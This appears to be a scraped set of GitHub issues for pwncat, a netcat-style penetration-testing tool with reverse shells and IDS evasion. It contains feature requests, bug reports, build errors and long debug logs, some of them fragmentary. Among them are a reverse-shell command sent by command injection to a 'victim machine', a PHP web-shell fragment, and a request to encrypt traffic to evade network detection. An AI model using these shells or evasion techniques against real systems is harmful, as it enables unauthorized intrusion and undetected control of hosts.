pwncat - netcat on steroids with Firewall, IDS/IPS evasion, bind and reverse shell, self-injecting shell and port forwarding magic - and its fully scriptable with Python (PSE)
Home Page: https://pwncat.org
License: MIT License
Ensure remote port forward (-R/--remote) is implemented.
Be able to have different log levels via (-v, -vv, -vvv, -vvvv, -vvvvv):
Implement basic connect mode - the client functionality
windows
Does this including injection work on windows?
Great tool by the way.
Ensure to have up-to-date API docs generated from Python code
Be able to communicate via UDP - server and client
To be at least in feature parity with netcat, the port argument should be able to take the following:
pwncat localhost 80
pwncat localhost 80,444
pwncat localhost 80,444,8000-8080
pwncat localhost 8000-8080
Implement feature: --reconn-robin
Currently, you cannot combine a listener (-l) with a port forward (-L or -R). I would like a way to create a port forward through this tunnel after my listener has caught a reverse shell. I recommend implementing a command in the shell similar to the upload or download commands that will allow you to specify ports to forward. reverse and local shouldn't conflict with any host shell commands, or perhaps reverse-pf and local-pf.
Often I find that after connecting to a machine that I need to add port forwarding for connecting to some service that is running on that machine. I do not currently know an easy way to upgrade a shell with port forwarding other than compiling an exploit and using meterpreter, using plink or chisel, or if I have credentials, using SSH. Most of these require running an additional binary on the host that may or may not be blocked from running.
Hi there,
When running the pwncat with option -u (for UDP mode) it does not work in background on GNU/Linux.
Example:
$ ./bin/pwncat -u -l 127.0.0.1 9999 &
[1]+ Stopped ./bin/pwncat -u -l 127.0.0.1 9999
A few seconds after starting it stops listening on the specified UDP port.
Best Regards,
mt
Implement feature: --safe-word
Extend feature: --udp-ping-intvl to --ping-intvl (TCP+UDP)
Do you have any idea why it does not pick up any python versions installed when it clearly has python installed on the box?
Originally posted by @dalemazza in #81 (comment)
Implement feature: --rebind-wait
Be able to specify what line feeds to use -C/--crlf
File PHP content:
" . shell_exec($_REQUEST['cmd']) . ""; ?>sudo] password for parrot:
┌─[root@parrot]─[/home/parrot]
└──╼ #pwncat-cs -lp 441
[19:15:38] Welcome to pwncat 🐈! main.py:164
bound to 0.0.0.0:441 ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━[19:15:55] connection failed: listener aborted manager.py:957
(local) pwncat$ exit
[19:15:57] closing interactive prompt manager.py:957
Some solution?
OS: Parrot OS
PWNCat:
──╼ #pwncat --version
pwncat: Version 0.1.1 (https://github.com/cytopia/pwncat) by cytopia
Be able to execute binaries (e.g.: -e /bin/bash or -e cmd.exe) via bind and reverse shells.
Implement UDP keep alive (--udp-ping-intvl)
Implement feature: --wait
Implement basic listen mode (-l/--listen) - the server functionality
Implement feature: --ping-init
When ctrl-c is pressed, you get a prompt to exit the session or continue and ignore
Further make pwncat ctrl-c proof
Ensure local port forward (-L/--local) is implemented
Ensure port scan (zero io mode: -z/--zero) is implemented
Implement feature: --ping-word
Implement colorized logging -c/--color with auto, never and always (similar to how grep is offering it)
* Build system packages:
* dev-python/setuptools : 62.1.0-r1
>>> Source prepared.
>>> Configuring source in /var/tmp/portage/net-analyzer/pwncat-0.1.2/work/pwncat-0.1.2 ...
>>> Source configured.
>>> Compiling source in /var/tmp/portage/net-analyzer/pwncat-0.1.2/work/pwncat-0.1.2 ...
* python3_9: running distutils-r1_run_phase distutils-r1_python_compile
python3.9 setup.py build -j 12
/usr/lib/python3.9/site-packages/setuptools/dist.py:757: UserWarning: Usage of dash-separated 'description-file' will not be supported in future versions. Please use the underscore name 'description_file' instead
warnings.warn(
error: Multiple top-level packages discovered in a flat-layout: ['pse', 'man', 'art', 'share'].
To avoid accidental inclusion of unwanted files or directories,
setuptools will not proceed with this build.
If you are trying to create a single distribution with multiple packages
on purpose, you should not rely on automatic discovery.
Instead, consider the following options:
1. set up custom discovery (`find` directive with `include` or `exclude`)
2. use a `src-layout`
3. explicitly set `py_modules` or `packages` with a list of names
Ensure re-initialization (--reinit, --reinit-robin and --reini-wait) is implemented
Implement feature: --ping-robin
Implement reconnect (--reconn) and reconnect wait time (--recon-wait). Reconnect option is only used after a successful initial connection has already been made.
The following URL no longer works. Browsing to it gives a 404 Not Found response (see attached image). Can you please update? Thankls.
https://raw.githubusercontent.com/cytopia/netcat/master/bin/netcat.py
Implement feature: --keep
This issue will stay open and serves as a public Roadmap to show what needs to be done until a release will be ready. Comments serve discussions and to gather new features
The current implementation of pwncat is in alpha state as not all features are available. This will be the first feature-ready release.
-l - listen mode-u - udp connections--crlf - change to windows linefeeds-v - verbosity-e - command execution-n - don't resolve DNS-L - local port forwarding-R - remote port forwarding-z - port scan mode / zero io mode--keep - keep listening for new connection (TCP)--reconn - re-try outbound connection periodically--reconn-wait - wait between re-try attempts--reconn-robin - (client only) round robin change outbound ports--rebind - try to rebind if it fails (only during init phase)--rebind-wait - wait between re-rebind attempts--rebind-robin - round robin re-bind attempts--udp-ping-intvl - faking a TCP-like stateful connection over UDP--udp-ping-intvl to --ping-intvl (to allow TCP as well)--ping-init - single initial ping--ping-word - what char/string to send as ping--ping-robin - round-robin ports while pinging--safe-word - shut down remote end immediately--script-send and --script-recv--udp-sconnect Stateless UDP connectGathering ideas for future release.
-d--http - tunnel via http--https tunnel via httpsThe addr part should be optional in -L/--local mode (local port forwward) and default to 0.0.0.0 if not specified
unsure if this is me doing something wrong but i and a few others i know have this issue thanks
Implement feature: --rebind-robin
Trying to send connection from netcat to pwncat, is that possible?
Victim machine command injection:
nc IP PORT -e /bin/bash
On my attacking machine:
pwncat -l IP PORT
It fails with the error whenever a command is run. Connection does get accepted.
ERROR: Socket OS Error: [Errno 9] Bad file descriptor
Add support for Python scripting with external files
Be able to modify send and/or received data via custom Python scripts.
Thanks for sharing your awsome tool. Self injection and port forwarding is so cool!
However, it seems only IPv4 address is supported for those features.
: is already used as separator for those options,
so ssh port fowarding like IPv6 notation (surrounded by []) may be better.
$ pwncat -l 4444 --self-inject /bin/bash:[xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx]:4445
$ pwncat -R [xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx]:4444 10.0.0.1 3306
$ pwncat -L [xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx]:5000 10.0.0.1 3306I tried to implement in this way.
Please see this change. (Seems working, and passed make code/make lint)
If this is OK, I will open a new PR for it. How do you think?
We can specify IPv6 address for --self-inject/-R/-L.
Be able to skip DNS resolutions (-n/--nodns)
Implement feature: --rebind
When I paste in shell created with pwncat I donot get full line echo?
Any idea what's wrong?
great tool by the way
bin/pwncat uses getName() which is deprecated. Please use "name" instead.
Would like to be able to set up 2 pwncat instances (client and server) and have the option to make the communications encrypted. I see the easiest way to do this is to create a flag --ssl which then wraps the socket; the pwncat server would also then need a method to try via normal communications and if fails try the SSL function
The goal is to encrypt the stream which would future evade network detection/protection systems
Server:
./pwncat -l 192.168.10.184 9999 --self-inject /bin/sh:192.168.10.184:10000 -vvvvv
2022-08-09 13:43:45,186 DEBUG [MainThread] 3396:__init__(): STDOUT isatty: True
2022-08-09 13:43:45,186 DEBUG [MainThread] 3397:__init__(): STDIN isatty: True
2022-08-09 13:43:45,186 DEBUG [MainThread] 3398:__init__(): STDIN posix: False (posix)
2022-08-09 13:43:45,186 DEBUG [MainThread] 1465:create_socket(): Creating (family 10/IPv6, TCP) socket
2022-08-09 13:43:45,186 DEBUG [MainThread] 1485:create_socket(): Disabling IPv4 support on IPv6 socket
2022-08-09 13:43:45,186 DEBUG [MainThread] 1465:create_socket(): Creating (family 2/IPv4, TCP) socket
2022-08-09 13:43:45,186 DEBUG [MainThread] 1414:gethostbyname(): Resolving IPv4 name not required, changing to IPv6: ::ffff:192.168.10.184
2022-08-09 13:43:45,186 DEBUG [MainThread] 1418:gethostbyname(): Resolving IPv4 host not required, already an IP: 192.168.10.184
2022-08-09 13:43:45,187 DEBUG [MainThread] 1517:bind(): Binding (family 10/IPv6, TCP) socket to ::ffff:192.168.10.184:9999
2022-08-09 13:43:45,187 DEBUG [MainThread] 1517:bind(): Binding (family 2/IPv4, TCP) socket to 192.168.10.184:9999
2022-08-09 13:43:45,187 DEBUG [MainThread] 2214:run_server(): Removing (family 10/IPv6) due to: Binding (family 10/IPv6, TCP) socket to ::ffff:192.168.10.184:9999 failed: [Errno 22] Invalid argument
2022-08-09 13:43:45,187 DEBUG [MainThread] 1545:listen(): Listening with backlog=0
2022-08-09 13:43:45,187 INFO [MainThread] 2247:run_server(): Listening on 192.168.10.184:9999 (family 2/IPv4, TCP)
2022-08-09 13:43:45,187 DEBUG [MainThread] 1574:accept(): Waiting for TCP client
2022-08-09 13:44:25,264 INFO [MainThread] 1591:accept(): Client connected from 192.168.10.254:5555 (family 2/IPv4, TCP)
[PWNCAT CnC] Checking if remote sends greeting...
2022-08-09 13:44:25,615 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 0.350531 sec in 1/5 rounds
2022-08-09 13:44:25,965 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 0.701250 sec in 2/5 rounds
2022-08-09 13:44:26,316 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.051963 sec in 3/5 rounds
2022-08-09 13:44:26,667 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.402650 sec in 4/5 rounds
2022-08-09 13:44:27,017 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.753344 sec in 5/5 rounds
[PWNCAT CnC] Checking if remote sends prefix/suffix to every request...
2022-08-09 13:44:27,018 DEBUG [MainThread] 1898:send(): Trying to send 15 bytes to 192.168.10.254:5555
2022-08-09 13:44:27,018 TRACE [MainThread] 1904:send(): Trying to send: b'echo "__pwn__"\n'
2022-08-09 13:44:27,018 DEBUG [MainThread] 1921:send(): Sent 15 bytes to 192.168.10.254:5555 (0 bytes remaining)
2022-08-09 13:44:27,368 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 0.350471 sec in 1/5 rounds
2022-08-09 13:44:27,719 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 0.701191 sec in 2/5 rounds
2022-08-09 13:44:28,070 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.051911 sec in 3/5 rounds
2022-08-09 13:44:28,420 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.402645 sec in 4/5 rounds
2022-08-09 13:44:28,771 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.753336 sec in 5/5 rounds
2022-08-09 13:44:28,771 DEBUG [MainThread] 4771:__set_remote_prefix(): Set suffix before: []
2022-08-09 13:44:28,771 DEBUG [MainThread] 4773:__set_remote_prefix(): Set suffix after: []
[PWNCAT CnC] Remote does not send prefix
[PWNCAT CnC] Remote does not send suffix
2022-08-09 13:44:28,772 DEBUG [MainThread] 4827:__set_remote_python_path(): Probing for: which python3
2022-08-09 13:44:28,772 DEBUG [MainThread] 1898:send(): Trying to send 26 bytes to 192.168.10.254:5555
2022-08-09 13:44:28,772 TRACE [MainThread] 1904:send(): Trying to send: b'which python3 2>/dev/null\n'
2022-08-09 13:44:28,772 DEBUG [MainThread] 1921:send(): Sent 26 bytes to 192.168.10.254:5555 (0 bytes remaining)
2022-08-09 13:44:29,122 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 0.350484 sec in 1/5 rounds
2022-08-09 13:44:29,473 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 0.701201 sec in 2/5 rounds
2022-08-09 13:44:29,824 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.051899 sec in 3/5 rounds
2022-08-09 13:44:30,175 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.402663 sec in 4/5 rounds
2022-08-09 13:44:30,525 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.753401 sec in 5/5 rounds
[PWNCAT CnC] Response:
2022-08-09 13:44:30,526 DEBUG [MainThread] 4827:__set_remote_python_path(): Probing for: which python
2022-08-09 13:44:30,526 DEBUG [MainThread] 1898:send(): Trying to send 25 bytes to 192.168.10.254:5555
2022-08-09 13:44:30,526 TRACE [MainThread] 1904:send(): Trying to send: b'which python 2>/dev/null\n'
2022-08-09 13:44:30,526 DEBUG [MainThread] 1921:send(): Sent 25 bytes to 192.168.10.254:5555 (0 bytes remaining)
2022-08-09 13:44:30,877 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 0.350487 sec in 1/5 rounds
2022-08-09 13:44:31,228 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 0.701441 sec in 2/5 rounds
2022-08-09 13:44:31,579 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.052403 sec in 3/5 rounds
2022-08-09 13:44:31,930 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.403363 sec in 4/5 rounds
2022-08-09 13:44:32,281 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.754384 sec in 5/5 rounds
[PWNCAT CnC] Response:
2022-08-09 13:44:32,282 DEBUG [MainThread] 4827:__set_remote_python_path(): Probing for: which python2
2022-08-09 13:44:32,282 DEBUG [MainThread] 1898:send(): Trying to send 26 bytes to 192.168.10.254:5555
2022-08-09 13:44:32,283 TRACE [MainThread] 1904:send(): Trying to send: b'which python2 2>/dev/null\n'
2022-08-09 13:44:32,283 DEBUG [MainThread] 1921:send(): Sent 26 bytes to 192.168.10.254:5555 (0 bytes remaining)
2022-08-09 13:44:32,634 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 0.350500 sec in 1/5 rounds
2022-08-09 13:44:32,985 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 0.701460 sec in 2/5 rounds
2022-08-09 13:44:33,336 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.052369 sec in 3/5 rounds
2022-08-09 13:44:33,687 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.403336 sec in 4/5 rounds
2022-08-09 13:44:34,038 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.754300 sec in 5/5 rounds
[PWNCAT CnC] Response:
2022-08-09 13:44:34,038 DEBUG [MainThread] 4827:__set_remote_python_path(): Probing for: which python2.7
2022-08-09 13:44:34,038 DEBUG [MainThread] 1898:send(): Trying to send 28 bytes to 192.168.10.254:5555
2022-08-09 13:44:34,039 TRACE [MainThread] 1904:send(): Trying to send: b'which python2.7 2>/dev/null\n'
2022-08-09 13:44:34,039 DEBUG [MainThread] 1921:send(): Sent 28 bytes to 192.168.10.254:5555 (0 bytes remaining)
2022-08-09 13:44:34,390 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 0.350504 sec in 1/5 rounds
2022-08-09 13:44:34,741 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 0.701578 sec in 2/5 rounds
2022-08-09 13:44:35,092 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.052568 sec in 3/5 rounds
2022-08-09 13:44:35,443 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.403498 sec in 4/5 rounds
2022-08-09 13:44:35,794 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.754471 sec in 5/5 rounds
[PWNCAT CnC] Response:
2022-08-09 13:44:35,794 DEBUG [MainThread] 4827:__set_remote_python_path(): Probing for: which python3.5
2022-08-09 13:44:35,794 DEBUG [MainThread] 1898:send(): Trying to send 28 bytes to 192.168.10.254:5555
2022-08-09 13:44:35,795 TRACE [MainThread] 1904:send(): Trying to send: b'which python3.5 2>/dev/null\n'
2022-08-09 13:44:35,795 DEBUG [MainThread] 1921:send(): Sent 28 bytes to 192.168.10.254:5555 (0 bytes remaining)
2022-08-09 13:44:36,145 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 0.350499 sec in 1/5 rounds
2022-08-09 13:44:36,496 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 0.701473 sec in 2/5 rounds
2022-08-09 13:44:36,847 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.052447 sec in 3/5 rounds
2022-08-09 13:44:37,198 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.403437 sec in 4/5 rounds
2022-08-09 13:44:37,549 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.754413 sec in 5/5 rounds
[PWNCAT CnC] Response:
2022-08-09 13:44:37,550 DEBUG [MainThread] 4827:__set_remote_python_path(): Probing for: which python3.6
2022-08-09 13:44:37,550 DEBUG [MainThread] 1898:send(): Trying to send 28 bytes to 192.168.10.254:5555
2022-08-09 13:44:37,550 TRACE [MainThread] 1904:send(): Trying to send: b'which python3.6 2>/dev/null\n'
2022-08-09 13:44:37,550 DEBUG [MainThread] 1921:send(): Sent 28 bytes to 192.168.10.254:5555 (0 bytes remaining)
2022-08-09 13:44:37,901 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 0.350496 sec in 1/5 rounds
2022-08-09 13:44:38,252 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 0.701492 sec in 2/5 rounds
2022-08-09 13:44:38,603 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.052461 sec in 3/5 rounds
2022-08-09 13:44:38,954 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.403419 sec in 4/5 rounds
2022-08-09 13:44:39,305 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.754393 sec in 5/5 rounds
[PWNCAT CnC] Response:
2022-08-09 13:44:39,306 DEBUG [MainThread] 4827:__set_remote_python_path(): Probing for: which python3.7
2022-08-09 13:44:39,306 DEBUG [MainThread] 1898:send(): Trying to send 28 bytes to 192.168.10.254:5555
2022-08-09 13:44:39,306 TRACE [MainThread] 1904:send(): Trying to send: b'which python3.7 2>/dev/null\n'
2022-08-09 13:44:39,306 DEBUG [MainThread] 1921:send(): Sent 28 bytes to 192.168.10.254:5555 (0 bytes remaining)
2022-08-09 13:44:39,657 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 0.350509 sec in 1/5 rounds
2022-08-09 13:44:40,008 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 0.701510 sec in 2/5 rounds
2022-08-09 13:44:40,359 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.052515 sec in 3/5 rounds
2022-08-09 13:44:40,710 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.403461 sec in 4/5 rounds
2022-08-09 13:44:41,061 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.754383 sec in 5/5 rounds
[PWNCAT CnC] Response:
2022-08-09 13:44:41,061 DEBUG [MainThread] 4827:__set_remote_python_path(): Probing for: which python3.8
2022-08-09 13:44:41,061 DEBUG [MainThread] 1898:send(): Trying to send 28 bytes to 192.168.10.254:5555
2022-08-09 13:44:41,062 TRACE [MainThread] 1904:send(): Trying to send: b'which python3.8 2>/dev/null\n'
2022-08-09 13:44:41,062 DEBUG [MainThread] 1921:send(): Sent 28 bytes to 192.168.10.254:5555 (0 bytes remaining)
2022-08-09 13:44:41,413 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 0.350526 sec in 1/5 rounds
2022-08-09 13:44:41,764 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 0.701422 sec in 2/5 rounds
2022-08-09 13:44:42,115 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.052393 sec in 3/5 rounds
2022-08-09 13:44:42,465 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.403347 sec in 4/5 rounds
2022-08-09 13:44:42,816 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.754319 sec in 5/5 rounds
[PWNCAT CnC] Response:
[PWNCAT CnC] Probing for: /usr/bin/python3
2022-08-09 13:44:42,817 DEBUG [MainThread] 1898:send(): Trying to send 58 bytes to 192.168.10.254:5555
2022-08-09 13:44:42,818 TRACE [MainThread] 1904:send(): Trying to send: b'test -f /usr/bin/python3 && echo /usr/bin/python3 || echo\n'
2022-08-09 13:44:42,818 DEBUG [MainThread] 1921:send(): Sent 58 bytes to 192.168.10.254:5555 (0 bytes remaining)
2022-08-09 13:44:43,169 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 0.350547 sec in 1/5 rounds
2022-08-09 13:44:43,520 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 0.701487 sec in 2/5 rounds
2022-08-09 13:44:43,871 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.052430 sec in 3/5 rounds
2022-08-09 13:44:44,222 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.403409 sec in 4/5 rounds
2022-08-09 13:44:44,573 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.754423 sec in 5/5 rounds
[...]
[PWNCAT CnC] Probing for: /opt/python3.8/bin/python3.8
2022-08-09 13:49:21,820 DEBUG [MainThread] 1898:send(): Trying to send 82 bytes to 192.168.10.254:5555
2022-08-09 13:49:21,820 TRACE [MainThread] 1904:send(): Trying to send: b'test -f /opt/python3.8/bin/python3.8 && echo /opt/python3.8/bin/python3.8 || echo\n'
2022-08-09 13:49:21,820 DEBUG [MainThread] 1921:send(): Sent 82 bytes to 192.168.10.254:5555 (0 bytes remaining)
2022-08-09 13:49:22,171 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 0.350498 sec in 1/5 rounds
2022-08-09 13:49:22,522 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 0.701218 sec in 2/5 rounds
2022-08-09 13:49:22,872 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.051955 sec in 3/5 rounds
2022-08-09 13:49:23,223 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.402681 sec in 4/5 rounds
2022-08-09 13:49:23,574 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.753400 sec in 5/5 rounds
[PWNCAT CnC] No Python has been found. Aborting and handing over to current shell.
2022-08-09 13:49:23,575 TRACE [RECV] 4014:run_action(): [RECV] Producer Start
2022-08-09 13:49:23,575 TRACE [STDIN] 4014:run_action(): [STDIN] Producer Start
2022-08-09 13:51:35,682 DEBUG [RECV] 2032:receive(): Received 19 bytes from 192.168.10.254:5555
2022-08-09 13:51:35,682 TRACE [RECV] 2038:receive(): Received: b'string from client\n'
2022-08-09 13:51:35,682 TRACE [RECV] 4016:run_action(): [RECV] Producer received: b'string from client\n'
string from client
STRING FROM SERVER
2022-08-09 13:51:49,136 DEBUG [STDIN] 3435:producer(): Received 19 bytes from STDIN
2022-08-09 13:51:49,136 TRACE [STDIN] 3436:producer(): Received: b'STRING FROM SERVER\n'
2022-08-09 13:51:49,136 TRACE [STDIN] 4016:run_action(): [STDIN] Producer received: b'STRING FROM SERVER\n'
2022-08-09 13:51:49,136 DEBUG [STDIN] 1898:send(): Trying to send 19 bytes to 192.168.10.254:5555
2022-08-09 13:51:49,136 TRACE [STDIN] 1904:send(): Trying to send: b'STRING FROM SERVER\n'
2022-08-09 13:51:49,136 DEBUG [STDIN] 1921:send(): Sent 19 bytes to 192.168.10.254:5555 (0 bytes remaining)
Client:
./pwncat --source-port 5555 --source-addr 192.168.10.254 192.168.10.184 9999 -vvvvv
2022-08-09 13:44:25,266 DEBUG [MainThread] 3396:__init__(): STDOUT isatty: True
2022-08-09 13:44:25,266 DEBUG [MainThread] 3397:__init__(): STDIN isatty: True
2022-08-09 13:44:25,266 DEBUG [MainThread] 3398:__init__(): STDIN posix: False (posix)
2022-08-09 13:44:25,266 DEBUG [MainThread] 1465:create_socket(): Creating (family 10/IPv6, TCP) socket
2022-08-09 13:44:25,266 DEBUG [MainThread] 1485:create_socket(): Disabling IPv4 support on IPv6 socket
2022-08-09 13:44:25,266 DEBUG [MainThread] 1465:create_socket(): Creating (family 2/IPv4, TCP) socket
2022-08-09 13:44:25,267 DEBUG [MainThread] 1414:gethostbyname(): Resolving IPv4 name not required, changing to IPv6: ::ffff:192.168.10.184
2022-08-09 13:44:25,267 DEBUG [MainThread] 1418:gethostbyname(): Resolving IPv4 host not required, already an IP: 192.168.10.184
2022-08-09 13:44:25,267 DEBUG [MainThread] 1636:connect(): Binding specifically to 192.168.10.254:5555
2022-08-09 13:44:25,267 DEBUG [MainThread] 1517:bind(): Binding (family 10/IPv6, TCP) socket to 192.168.10.254:5555
2022-08-09 13:44:25,267 DEBUG [MainThread] 1636:connect(): Binding specifically to 192.168.10.254:5555
2022-08-09 13:44:25,267 DEBUG [MainThread] 1517:bind(): Binding (family 2/IPv4, TCP) socket to 192.168.10.254:5555
2022-08-09 13:44:25,267 DEBUG [MainThread] 1641:connect(): Connecting to 192.168.10.184:9999 (family 2/IPv4, TCP)
2022-08-09 13:44:25,268 DEBUG [MainThread] 1690:connect(): Connected from 192.168.10.254:5555
2022-08-09 13:44:25,269 INFO [MainThread] 1695:connect(): Connected to 192.168.10.184:9999 (family 2/IPv4, TCP)
2022-08-09 13:44:25,269 TRACE [RECV] 4014:run_action(): [RECV] Producer Start
2022-08-09 13:44:25,269 TRACE [STDIN] 4014:run_action(): [STDIN] Producer Start
2022-08-09 13:44:27,023 DEBUG [RECV] 2032:receive(): Received 15 bytes from 192.168.10.184:9999
2022-08-09 13:44:27,023 TRACE [RECV] 2038:receive(): Received: b'echo "__pwn__"\n'
2022-08-09 13:44:27,023 TRACE [RECV] 4016:run_action(): [RECV] Producer received: b'echo "__pwn__"\n'
echo "__pwn__"
2022-08-09 13:44:28,777 DEBUG [RECV] 2032:receive(): Received 26 bytes from 192.168.10.184:9999
2022-08-09 13:44:28,777 TRACE [RECV] 2038:receive(): Received: b'which python3 2>/dev/null\n'
2022-08-09 13:44:28,777 TRACE [RECV] 4016:run_action(): [RECV] Producer received: b'which python3 2>/dev/null\n'
which python3 2>/dev/null
2022-08-09 13:44:30,532 DEBUG [RECV] 2032:receive(): Received 25 bytes from 192.168.10.184:9999
2022-08-09 13:44:30,532 TRACE [RECV] 2038:receive(): Received: b'which python 2>/dev/null\n'
2022-08-09 13:44:30,532 TRACE [RECV] 4016:run_action(): [RECV] Producer received: b'which python 2>/dev/null\n'
which python 2>/dev/null
2022-08-09 13:44:32,288 DEBUG [RECV] 2032:receive(): Received 26 bytes from 192.168.10.184:9999
2022-08-09 13:44:32,288 TRACE [RECV] 2038:receive(): Received: b'which python2 2>/dev/null\n'
2022-08-09 13:44:32,289 TRACE [RECV] 4016:run_action(): [RECV] Producer received: b'which python2 2>/dev/null\n'
which python2 2>/dev/null
2022-08-09 13:44:34,044 DEBUG [RECV] 2032:receive(): Received 28 bytes from 192.168.10.184:9999
2022-08-09 13:44:34,044 TRACE [RECV] 2038:receive(): Received: b'which python2.7 2>/dev/null\n'
2022-08-09 13:44:34,044 TRACE [RECV] 4016:run_action(): [RECV] Producer received: b'which python2.7 2>/dev/null\n'
which python2.7 2>/dev/null
2022-08-09 13:44:35,800 DEBUG [RECV] 2032:receive(): Received 28 bytes from 192.168.10.184:9999
2022-08-09 13:44:35,800 TRACE [RECV] 2038:receive(): Received: b'which python3.5 2>/dev/null\n'
2022-08-09 13:44:35,800 TRACE [RECV] 4016:run_action(): [RECV] Producer received: b'which python3.5 2>/dev/null\n'
which python3.5 2>/dev/null
2022-08-09 13:44:37,556 DEBUG [RECV] 2032:receive(): Received 28 bytes from 192.168.10.184:9999
2022-08-09 13:44:37,556 TRACE [RECV] 2038:receive(): Received: b'which python3.6 2>/dev/null\n'
2022-08-09 13:44:37,556 TRACE [RECV] 4016:run_action(): [RECV] Producer received: b'which python3.6 2>/dev/null\n'
which python3.6 2>/dev/null
2022-08-09 13:44:39,311 DEBUG [RECV] 2032:receive(): Received 28 bytes from 192.168.10.184:9999
2022-08-09 13:44:39,312 TRACE [RECV] 2038:receive(): Received: b'which python3.7 2>/dev/null\n'
2022-08-09 13:44:39,312 TRACE [RECV] 4016:run_action(): [RECV] Producer received: b'which python3.7 2>/dev/null\n'
which python3.7 2>/dev/null
2022-08-09 13:44:41,067 DEBUG [RECV] 2032:receive(): Received 28 bytes from 192.168.10.184:9999
2022-08-09 13:44:41,067 TRACE [RECV] 2038:receive(): Received: b'which python3.8 2>/dev/null\n'
2022-08-09 13:44:41,068 TRACE [RECV] 4016:run_action(): [RECV] Producer received: b'which python3.8 2>/dev/null\n'
which python3.8 2>/dev/null
2022-08-09 13:44:42,823 DEBUG [RECV] 2032:receive(): Received 58 bytes from 192.168.10.184:9999
2022-08-09 13:44:42,823 TRACE [RECV] 2038:receive(): Received: b'test -f /usr/bin/python3 && echo /usr/bin/python3 || echo\n'
2022-08-09 13:44:42,823 TRACE [RECV] 4016:run_action(): [RECV] Producer received: b'test -f /usr/bin/python3 && echo /usr/bin/python3 || echo\n'
test -f /usr/bin/python3 && echo /usr/bin/python3 || echo
2022-08-09 13:44:44,579 DEBUG [RECV] 2032:receive(): Received 56 bytes from 192.168.10.184:9999
2022-08-09 13:44:44,579 TRACE [RECV] 2038:receive(): Received: b'test -f /usr/bin/python && echo /usr/bin/python || echo\n'
2022-08-09 13:44:44,579 TRACE [RECV] 4016:run_action(): [RECV] Producer received: b'test -f /usr/bin/python && echo /usr/bin/python || echo\n'
[...]
2022-08-09 13:49:21,826 DEBUG [RECV] 2032:receive(): Received 82 bytes from 192.168.10.184:9999
2022-08-09 13:49:21,826 TRACE [RECV] 2038:receive(): Received: b'test -f /opt/python3.8/bin/python3.8 && echo /opt/python3.8/bin/python3.8 || echo\n'
2022-08-09 13:49:21,826 TRACE [RECV] 4016:run_action(): [RECV] Producer received: b'test -f /opt/python3.8/bin/python3.8 && echo /opt/python3.8/bin/python3.8 || echo\n'
